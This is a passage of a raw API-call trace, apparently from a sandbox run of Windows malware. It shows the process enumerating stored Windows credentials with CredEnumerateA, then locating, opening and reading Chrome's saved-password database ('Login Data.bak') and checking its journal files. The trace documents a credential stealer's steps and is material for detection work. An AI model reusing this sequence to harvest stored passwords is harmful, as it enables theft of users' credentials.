	[0234.577] CredEnumerateA (in: Filter=0x0, Flags=0x0, Count=0x16ef9b8, Credential=0x16ef9c8 | out: Count=0x16ef9b8, Credential=0x16ef9c8) returned 0
	[0234.577] CredEnumerateA (in: Filter=0x0, Flags=0x1, Count=0x16ef9b8, Credential=0x16ef9c8 | out: Count=0x16ef9b8, Credential=0x16ef9c8) returned 0
	[0234.577] ResetEvent (hEvent=0xc) returned 1
	[0234.577] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0

Thread:
	id = 220
	os_tid = 0x788

	[0207.111] Sleep (dwMilliseconds=0x7530) 
	[0218.947] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a448
	[0218.947] ResetEvent (hEvent=0xc) returned 1
	[0218.947] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0218.963] ResetEvent (hEvent=0xc) returned 1
	[0218.963] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0218.979] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0218.979] SHGetSpecialFolderPathA (in: hwnd=0x0, pszPath=0x1b5f108, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 1
	[0218.979] ResetEvent (hEvent=0xc) returned 1
	[0218.979] WaitForSingleObject (hHandle=0xc, dwMilliseconds=0xffffffff) returned 0x0
	[0218.994] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x2c) returned 0x38a528
	[0218.994] lstrlenA (lpString="C:\\Users\\2XC7u663GxWc\\AppData\\Local") returned 35
	[0218.994] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x8, Size=0x1000) returned 0x3a07b0
	[0218.994] lstrlenA (lpString="\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 47
	[0218.994] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0218.995] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0218.995] VirtualFree (lpAddress=0xe0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.995] GetSystemInfo (in: lpSystemInfo=0x1010d2f8 | out: lpSystemInfo=0x1010d2f8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0218.996] VirtualFree (lpAddress=0x20000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.996] VirtualAlloc (lpAddress=0x0, dwSize=0x1d0, flAllocationType=0x3000, flProtect=0x4) returned 0x20000
	[0218.996] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0xe0000
	[0218.996] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x360000
	[0218.997] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x470000
	[0218.997] VirtualAlloc (lpAddress=0x0, dwSize=0x43, flAllocationType=0x3000, flProtect=0x4) returned 0x520000
	[0218.997] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x530000
	[0218.997] VirtualAlloc (lpAddress=0x0, dwSize=0x42, flAllocationType=0x3000, flProtect=0x4) returned 0x540000
	[0218.997] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x550000
	[0218.998] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0218.998] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x5b0000
	[0218.998] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5c0000
	[0218.998] VirtualAlloc (lpAddress=0x0, dwSize=0x822, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0218.998] GetVersionExA (in: lpVersionInformation=0x1b5eadc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x37d8a8, dwMinorVersion=0x376590, dwBuildNumber=0x20032, dwPlatformId=0x1, szCSDVersion="X\x02") | out: lpVersionInformation=0x1b5eadc*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0218.998] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83
	[0218.998] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0218.999] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5a0000, cbMultiByte=-1, lpWideCharStr=0x5e0000, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 83
	[0218.999] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53
	[0218.999] VirtualAlloc (lpAddress=0x0, dwSize=0xac, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0218.999] GetFullPathNameW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", nBufferLength=0x56, lpBuffer=0x5f0000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", lpFilePart=0x0) returned 0x52
	[0218.999] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 83
	[0218.999] VirtualAlloc (lpAddress=0x0, dwSize=0x53, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0218.999] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", cchWideChar=-1, lpMultiByteStr=0x5e0000, cbMultiByte=83, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak", lpUsedDefaultChar=0x0) returned 83
	[0218.999] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0218.999] VirtualFree (lpAddress=0x5e0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.000] VirtualAlloc (lpAddress=0x0, dwSize=0x2f8, flAllocationType=0x3000, flProtect=0x4) returned 0x5e0000
	[0219.000] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.000] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 83
	[0219.000] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.000] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e01f0, cbMultiByte=-1, lpWideCharStr=0x5d0000, cchWideChar=83 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak") returned 83
	[0219.000] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), fInfoLevelId=0x0, lpFileInformation=0x1b5eb0c | out: lpFileInformation=0x1b5eb0c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x61114ac0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x61114ac0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0xcc5bdb30, ftLastWriteTime.dwHighDateTime=0x1d348db, nFileSizeHigh=0x0, nFileSizeLow=0x4800)) returned 1
	[0219.000] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114
	[0219.001] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.001] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.001] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5eb50, dwLength=0x1c | out: lpBuffer=0x1b5eb50*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.001] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.001] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.001] ReadFile (in: hFile=0x114, lpBuffer=0x1b5ec18, nNumberOfBytesToRead=0x64, lpNumberOfBytesRead=0x1b5ec04, lpOverlapped=0x1b5ebc8 | out: lpBuffer=0x1b5ec18*, lpNumberOfBytesRead=0x1b5ec04*=0x64, lpOverlapped=0x1b5ebc8) returned 1
	[0219.002] VirtualAlloc (lpAddress=0x0, dwSize=0x800, flAllocationType=0x3000, flProtect=0x4) returned 0x1620000
	[0219.002] VirtualQuery (in: lpAddress=0x1620000, lpBuffer=0x1b5eba8, dwLength=0x1c | out: lpBuffer=0x1b5eba8*(BaseAddress=0x1620000, AllocationBase=0x1620000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.003] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1630000
	[0219.003] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1640000
	[0219.003] VirtualFree (lpAddress=0x1610000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.003] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.003] VirtualQuery (in: lpAddress=0x5d0000, lpBuffer=0x1b5ebac, dwLength=0x1c | out: lpBuffer=0x1b5ebac*(BaseAddress=0x5d0000, AllocationBase=0x5d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.003] VirtualFree (lpAddress=0x5d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.003] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5d0000
	[0219.004] VirtualAlloc (lpAddress=0x0, dwSize=0x54, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000
	[0219.004] VirtualAlloc (lpAddress=0x0, dwSize=0x22, flAllocationType=0x3000, flProtect=0x4) returned 0x1610000
	[0219.004] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1650000
	[0219.004] VirtualAlloc (lpAddress=0x0, dwSize=0x1d4c0, flAllocationType=0x3000, flProtect=0x4) returned 0x1660000
	[0219.004] VirtualQuery (in: lpAddress=0x1660000, lpBuffer=0x1b5ec78, dwLength=0x1c | out: lpBuffer=0x1b5ec78*(BaseAddress=0x1660000, AllocationBase=0x1660000, AllocationProtect=0x4, RegionSize=0x1e000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.005] VirtualFree (lpAddress=0x5a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.006] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3a07b0 | out: hHeap=0x370000) returned 1
	[0219.006] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x38a528 | out: hHeap=0x370000) returned 1
	[0219.006] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x5a0000
	[0219.006] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1680000
	[0219.007] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x1690000
	[0219.007] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x16a0000
	[0219.007] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0x16f0000
	[0219.007] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1700000
	[0219.007] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x1710000
	[0219.008] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1720000
	[0219.008] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1730000
	[0219.008] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.008] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.008] VirtualQuery (in: lpAddress=0x1750000, lpBuffer=0x1b5d6ac, dwLength=0x1c | out: lpBuffer=0x1b5d6ac*(BaseAddress=0x1750000, AllocationBase=0x1750000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.009] VirtualFree (lpAddress=0x1750000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.009] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.020] LockFileEx (in: hFile=0x114, dwFlags=0x3, dwReserved=0x0, nNumberOfBytesToLockLow=0x1, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5dff0 | out: lpOverlapped=0x1b5dff0) returned 1
	[0219.021] LockFileEx (in: hFile=0x114, dwFlags=0x1, dwReserved=0x0, nNumberOfBytesToLockLow=0x1fe, nNumberOfBytesToLockHigh=0x0, lpOverlapped=0x1b5dfdc | out: lpOverlapped=0x1b5dfdc) returned 1
	[0219.021] UnlockFileEx (in: hFile=0x114, dwReserved=0x0, nNumberOfBytesToUnlockLow=0x1, nNumberOfBytesToUnlockHigh=0x0, lpOverlapped=0x1b5dff4 | out: lpOverlapped=0x1b5dff4) returned 1
	[0219.021] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0244, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 91
	[0219.021] VirtualAlloc (lpAddress=0x0, dwSize=0xb6, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.021] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e0244, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=91 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-journal") returned 91
	[0219.021] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-journal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak-journal"), fInfoLevelId=0x0, lpFileInformation=0x1b5dfe8 | out: lpFileInformation=0x1b5dfe8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.022] GetLastError () returned 0x2
	[0219.022] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.022] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029f, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 87
	[0219.022] VirtualAlloc (lpAddress=0x0, dwSize=0xae, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.023] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5e029f, cbMultiByte=-1, lpWideCharStr=0x1740000, cchWideChar=87 | out: lpWideCharStr="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-wal") returned 87
	[0219.023] GetFileAttributesExW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data.bak-wal" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\local\\google\\chrome\\user data\\default\\login data.bak-wal"), fInfoLevelId=0x0, lpFileInformation=0x1b5e018 | out: lpFileInformation=0x1b5e018*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0219.023] GetLastError () returned 0x2
	[0219.023] VirtualFree (lpAddress=0x1740000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.023] GetFileSize (in: hFile=0x114, lpFileSizeHigh=0x1b5e034 | out: lpFileSizeHigh=0x1b5e034*=0x0) returned 0x4800
	[0219.023] VirtualAlloc (lpAddress=0x0, dwSize=0xac80, flAllocationType=0x3000, flProtect=0x4) returned 0x1740000
	[0219.023] VirtualQuery (in: lpAddress=0x1740000, lpBuffer=0x1b5dfbc, dwLength=0x1c | out: lpBuffer=0x1b5dfbc*(BaseAddress=0x1740000, AllocationBase=0x1740000, AllocationProtect=0x4, RegionSize=0xb000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.024] ReadFile (in: hFile=0x114, lpBuffer=0x174a3e0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e014, lpOverlapped=0x1b5dfd8 | out: lpBuffer=0x174a3e0*, lpNumberOfBytesRead=0x1b5e014*=0x800, lpOverlapped=0x1b5dfd8) returned 1
	[0219.025] VirtualAlloc (lpAddress=0x0, dwSize=0x5, flAllocationType=0x3000, flProtect=0x4) returned 0x1750000
	[0219.026] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1760000
	[0219.026] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1a80000
	[0219.026] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1a90000
	[0219.026] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.027] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.027] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.027] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1ad0000
	[0219.027] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ae0000
	[0219.027] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.028] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.028] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.028] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.028] VirtualAlloc (lpAddress=0x0, dwSize=0x34, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.029] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.029] VirtualAlloc (lpAddress=0x0, dwSize=0x70, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.029] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.029] VirtualFree (lpAddress=0x1ab0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.029] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.030] VirtualFree (lpAddress=0x1aa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.030] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1aa0000
	[0219.030] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1ab0000
	[0219.030] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.030] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.030] VirtualQuery (in: lpAddress=0x1af0000, lpBuffer=0x1b5d64c, dwLength=0x1c | out: lpBuffer=0x1b5d64c*(BaseAddress=0x1af0000, AllocationBase=0x1af0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.031] VirtualFree (lpAddress=0x1af0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.031] VirtualFree (lpAddress=0x1ac0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.031] VirtualAlloc (lpAddress=0x0, dwSize=0x7, flAllocationType=0x3000, flProtect=0x4) returned 0x1ac0000
	[0219.032] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1af0000
	[0219.032] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1b00000
	[0219.032] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.032] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1b60000
	[0219.032] VirtualAlloc (lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x4) returned 0x1b70000
	[0219.033] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1b80000
	[0219.033] VirtualAlloc (lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x4) returned 0x1b90000
	[0219.033] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1ba0000
	[0219.033] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1bb0000
	[0219.033] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1bc0000
	[0219.034] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1bd0000
	[0219.034] VirtualQuery (in: lpAddress=0x1b10000, lpBuffer=0x1b5d648, dwLength=0x1c | out: lpBuffer=0x1b5d648*(BaseAddress=0x1b10000, AllocationBase=0x1b10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.034] VirtualQuery (in: lpAddress=0x1b10000, lpBuffer=0x1b5d644, dwLength=0x1c | out: lpBuffer=0x1b5d644*(BaseAddress=0x1b10000, AllocationBase=0x1b10000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.034] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.034] VirtualFree (lpAddress=0x1b10000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.034] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1b10000
	[0219.035] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x1bf0000
	[0219.035] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x1c00000
	[0219.035] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x1c10000
	[0219.035] VirtualAlloc (lpAddress=0x0, dwSize=0x13, flAllocationType=0x3000, flProtect=0x4) returned 0x1c20000
	[0219.035] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x1d40000
	[0219.036] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1d50000
	[0219.036] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1d60000
	[0219.036] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5d648, dwLength=0x1c | out: lpBuffer=0x1b5d648*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.036] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5d644, dwLength=0x1c | out: lpBuffer=0x1b5d644*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.036] VirtualAlloc (lpAddress=0x0, dwSize=0x180, flAllocationType=0x3000, flProtect=0x4) returned 0x1d70000
	[0219.036] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.037] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.037] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1d80000
	[0219.037] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000
	[0219.037] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.038] VirtualAlloc (lpAddress=0x0, dwSize=0x1d, flAllocationType=0x3000, flProtect=0x4) returned 0x1db0000
	[0219.038] VirtualAlloc (lpAddress=0x0, dwSize=0x3b, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.038] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.038] VirtualAlloc (lpAddress=0x0, dwSize=0x41, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.038] VirtualQuery (in: lpAddress=0x1dd0000, lpBuffer=0x1b5d658, dwLength=0x1c | out: lpBuffer=0x1b5d658*(BaseAddress=0x1dd0000, AllocationBase=0x1dd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
